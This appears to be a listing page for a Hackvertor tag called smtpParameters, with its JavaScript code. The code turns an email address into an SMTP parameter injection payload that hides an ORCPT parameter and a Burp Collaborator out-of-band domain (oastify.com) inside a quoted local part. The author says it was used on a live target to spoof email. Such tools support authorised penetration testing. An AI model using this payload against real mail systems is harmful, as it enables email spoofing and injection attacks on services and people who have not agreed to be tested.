smtpParameters
This tag creates a SMTP parameter attack. I've found this attack on a live target. The parameters specify your collaborator payload and domain. The input should contain the email you want to spoof.
Created by: hackvertor
Installed 1 times
Viewed: 4
Category: Email
Created on: Wednesday, September 10, 2025 at 8:04:34 PM
Updated on: Wednesday, September 10, 2025 at 8:04:34 PM
Tag arguments
[
{
"type": "string",
"help": "This is your collaborator payload",
"defaultValue": "collab"
},
{
"type": "string",
"help": "This is your collaborator domain",
"defaultValue": "oastify.com"
}
]
Code
class smtpParameters {
encode(input, collaboratorPayload, collaborator) {
let[user,domain] = input.split("@");
return `"${collaboratorPayload}\\"@${collaborator}> ORCPT=test;${user}"@${domain}`;
}
}